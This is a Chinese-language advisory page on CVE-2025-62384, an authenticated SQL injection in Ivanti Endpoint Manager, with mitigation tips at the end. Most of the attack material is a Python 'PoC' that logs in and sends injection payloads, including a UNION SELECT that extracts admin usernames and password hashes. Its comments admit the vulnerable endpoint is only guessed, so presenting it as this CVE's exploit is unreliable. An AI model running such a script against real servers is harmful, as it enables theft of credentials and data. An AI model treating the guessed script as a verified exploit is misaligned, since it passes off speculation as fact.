CVE-2025-62384：Ivanti Endpoint Manager SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-62384

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ivanti Endpoint Manager (EPM)

漏洞概述

CVE-2025-62384是Ivanti Endpoint Manager（EPM）终端管理平台中的一个SQL注入漏洞。该漏洞存在于2024 SU5版本之前的Ivanti Endpoint Manager中，允许经过身份验证的远程攻击者通过构造恶意的SQL查询语句，从数据库中读取任意数据。

Ivanti Endpoint Manager是Ivanti公司推出的一款企业级终端管理解决方案，广泛应用于IT资产管理、软件分发、补丁管理、远程控制等场景。由于其部署在企业核心网络中，管理着大量终端设备和敏感数据，因此一旦存在安全漏洞，将对企业的信息安全构成严重威胁。

该漏洞的CVSS评分为6.5，属于中危级别。虽然漏洞需要低权限认证（PR:L）才能利用，但攻击向量为网络（AV:N），且无需用户交互（UI:N），机密性影响为高（C:H）。这意味着经过认证的低权限用户（如普通终端用户或被入侵的账户）可以利用此漏洞读取数据库中的敏感信息，包括但不限于管理员凭据、用户信息、配置数据等。该漏洞已于2025年10月13日公开披露，Ivanti公司也发布了相应的安全公告。

技术细节

SQL注入（SQL Injection）是一种经典的Web安全漏洞，攻击者通过在应用程序的输入字段中插入恶意的SQL代码片段，绕过应用程序的安全验证机制，直接与后端数据库进行交互。当应用程序未对用户输入进行充分的过滤、转义或参数化处理时，攻击者可以构造特殊的SQL语句来操纵数据库查询逻辑。

在CVE-2025-62384中，Ivanti Endpoint Manager的某些功能模块未能正确处理用户提供的输入参数，导致恶意SQL代码被注入到数据库查询中。由于该漏洞需要低权限认证（PR:L），攻击者首先需要获取EPM的有效账户凭据，这可以通过钓鱼攻击、暴力破解或利用其他漏洞来实现。

获取认证后，攻击者可以通过以下方式利用此漏洞：
1. 识别EPM中接受用户输入的接口（如搜索功能、报表生成、过滤条件等）
2. 在输入字段中注入SQL payload，如 ' OR '1'='1' -- 或 UNION SELECT 语句
3. 通过构造的SQL查询，绕过正常的访问控制，从数据库中提取任意数据
4. 可能利用数据库的功能（如xp_cmdshell等）进一步扩展攻击范围

由于该漏洞仅影响机密性（C:H），不影响完整性和可用性，因此主要风险在于敏感数据泄露，如管理员密码哈希、用户凭据、系统配置等。

攻击链分析

STEP 1

步骤1：初始访问

攻击者通过钓鱼攻击、暴力破解或利用其他漏洞获取Ivanti Endpoint Manager的低权限账户凭据，成功登录到目标系统。

STEP 2

步骤2：漏洞探测

攻击者枚举EPM的Web接口和API端点，识别接受用户输入的参数，如搜索过滤、报表查询等功能模块。

STEP 3

步骤3：注入SQL Payload

攻击者在可注入的参数中构造恶意的SQL语句，如使用UNION SELECT或布尔盲注技术，绕过正常的查询逻辑。

STEP 4

步骤4：数据提取

通过SQL注入漏洞，攻击者从数据库中读取任意数据，包括管理员凭据、用户信息、系统配置等敏感信息。

STEP 5

步骤5：权限提升与数据泄露

利用获取的管理员凭据或敏感信息，攻击者可能进一步提升权限，扩大攻击范围，导致大规模数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62384 PoC - Ivanti Endpoint Manager SQL Injection
# Vulnerability: SQL Injection in Ivanti Endpoint Manager before 2024 SU5
# Requirement: Low-privilege authenticated access

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-epm-server"
USERNAME = sys.argv[2] if len(sys.argv) > 2 else "user"
PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "password"

session = requests.Session()

# Step 1: Authenticate to EPM with low-privilege credentials
login_url = f"{TARGET_URL}/api/auth/login"
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
response = session.post(login_url, json=login_data, verify=False)
print(f"[*] Authentication status: {response.status_code}")

# Step 2: Identify injectable parameter (e.g., search/filter endpoint)
# The vulnerable endpoint may vary; common targets include:
# - Device search/filter parameters
# - Report query parameters
# - Asset management filters

# Step 3: Inject SQL payload to extract data
# Example: Boolean-based blind SQL injection
vulnerable_endpoint = f"{TARGET_URL}/api/devices/search"
injection_payload = "' OR '1'='1' --"

params = {
    "filter": injection_payload,
    "limit": 100
}

response = session.get(vulnerable_endpoint, params=params, verify=False)
print(f"[*] Injection response status: {response.status_code}")

# Step 4: Extract sensitive data using UNION-based injection
# Example payload to enumerate tables
union_payload = "' UNION SELECT table_name, NULL FROM information_schema.tables --"
params_union = {
    "filter": union_payload,
    "limit": 100
}
response = session.get(vulnerable_endpoint, params=params_union, verify=False)

if response.status_code == 200:
    print("[+] SQL Injection successful!")
    print(f"[*] Response data: {response.text[:500]}")
    # Parse response to extract database contents
else:
    print("[-] Injection may have failed or endpoint is different")

# Step 5: Extract admin credentials (example)
admin_creds_payload = "' UNION SELECT username, password_hash FROM users WHERE role='admin' --"
params_creds = {
    "filter": admin_creds_payload,
    "limit": 10
}
response = session.get(vulnerable_endpoint, params=params_creds, verify=False)
print(f"[*] Admin credentials extraction: {response.text[:500]}")

影响范围

Ivanti Endpoint Manager < 2024 SU5

防御指南

临时缓解措施

在无法立即升级到2024 SU5版本的情况下，建议采取以下临时缓解措施：1）限制EPM管理控制台的访问来源，仅允许可信IP地址访问；2）加强账户安全管理，要求所有用户使用强密码并启用多因素认证；3）部署WAF规则检测SQL注入攻击特征；4）监控数据库日志，及时发现异常查询行为；5）审查并限制低权限用户的可用功能模块；6）定期更换数据库管理员密码，降低凭据泄露后的风险。